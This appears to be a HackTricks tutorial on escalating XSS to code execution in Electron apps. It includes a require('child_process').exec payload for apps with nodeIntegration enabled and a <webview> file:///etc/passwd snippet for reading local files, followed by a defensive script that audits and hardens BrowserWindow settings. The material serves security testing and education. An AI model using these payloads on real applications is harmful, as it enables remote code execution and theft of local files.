HackTricks
XSS to RCE Electron Desktop Apps
When I test an Electron app, the first thing I check is the options passed to the BrowserWindow API, which creates a browser window. From those options I work out how RCE could be reached once arbitrary JavaScript execution in the renderer is possible. Example:
```javascript
const mainWindowOptions = {
  title: 'Discord',
  backgroundColor: getBackgroundColor(),
  width: DEFAULT_WIDTH,
  height: DEFAULT_HEIGHT,
  minWidth: MIN_WIDTH,
  minHeight: MIN_HEIGHT,
  transparent: false,
  frame: false,
  resizable: true,
  show: isVisible,
  webPreferences: {
    blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
    nodeIntegration: false,
    preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
    nativeWindowOpen: true,
    enableRemoteModule: false,
    spellcheck: true
  }
};
```

nodeIntegration RCE

If nodeIntegration is set to true, the web page's JavaScript can use Node.js features simply by calling require(). For example, this is how the calc application is executed on Windows:

```html
<script>
  require('child_process').exec('calc');
</script>
```

Read Arbitrary Internal File

If contextIsolation is set to false, you can try to use <webview> (similar to <iframe>, but able to load local files) to read local files and exfiltrate them, using something like <webview src="file:///etc/passwd"></webview>.
(Trick copied from here.)
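As an added example serving both the BrowserWindow options check at the top and the two sections above (not code from this page, Discord or Electron), here is an audit of a window options object: it fills unset webPreferences with the defaults of the app's Electron major version (assumed from Electron's release notes for 5, 10, 12 and 20), flags the settings that let renderer XSS reach Node or local files, and returns a hardened copy. The sample options object is constructed to mirror the Discord snippet; note that the <webview> tag only exists when webviewTag is enabled.

```javascript
// Added example, not code from the HackTricks page, Discord or Electron itself.
// Unset webPreferences are filled with the defaults of the app's Electron major
// version (they changed in 5, 10, 12 and 20), then risky settings are flagged.
function defaultsFor(electronMajor) {
  return {
    nodeIntegration: electronMajor < 5,     // default became false in Electron 5
    webviewTag: electronMajor < 5,          // default became false in Electron 5
    enableRemoteModule: electronMajor < 10, // false from 10, module removed in 14
    contextIsolation: electronMajor >= 12,  // default became true in Electron 12
    sandbox: electronMajor >= 20,           // default became true in Electron 20
    webSecurity: true,
  };
}
function effectivePrefs(webPreferences, electronMajor) {
  const prefs = { ...defaultsFor(electronMajor), ...webPreferences };
  // Electron 20+ only sandboxes by default when nodeIntegration is off.
  if (webPreferences.sandbox === undefined && prefs.nodeIntegration) prefs.sandbox = false;
  return prefs;
}
// [setting, dangerous value, why it matters once the renderer runs attacker JS]
const RULES = [
  ['nodeIntegration', true, 'page JS can require() Node modules such as child_process'],
  ['contextIsolation', false, 'page JS shares one JS world with the preload script'],
  ['sandbox', false, 'renderer process is not OS-sandboxed'],
  ['webviewTag', true, '<webview> tag exists and can load file:// URLs'],
  ['enableRemoteModule', true, 'remote module hands main-process objects to the renderer'],
  ['webSecurity', false, 'same-origin policy is disabled'],
];

function auditWindowOptions(windowOptions, electronMajor) {
  const prefs = effectivePrefs(windowOptions.webPreferences || {}, electronMajor);
  return RULES.filter(([key, bad]) => prefs[key] === bad)
    .map(([key, , why]) => ({ setting: key, value: prefs[key], why }));
}

// Sets every risky key explicitly so the result no longer depends on defaults.
function hardenWindowOptions(windowOptions) {
  const safe = { nodeIntegration: false, contextIsolation: true, sandbox: true,
    webviewTag: false, enableRemoteModule: false, webSecurity: true };
  return { ...windowOptions, webPreferences: { ...(windowOptions.webPreferences || {}), ...safe } };
}

// Constructed sample mirroring the Discord options above (preload path shortened).
const sampleOptions = { title: 'Discord', webPreferences: { nodeIntegration: false,
  preload: 'mainScreenPreload.js', nativeWindowOpen: true, enableRemoteModule: false, spellcheck: true } };

if (typeof require !== 'undefined' && require.main === module) {
  for (const major of [9, 22]) console.log(`Electron ${major}:`, auditWindowOptions(sampleOptions, major));
  console.log('hardened on 9:', auditWindowOptions(hardenWindowOptions(sampleOptions), 9));
}
```

The same Discord-style config is flagged for contextIsolation and sandbox when audited as Electron 9 and is clean as Electron 22, which is why the audit needs the shipped version, not just the file.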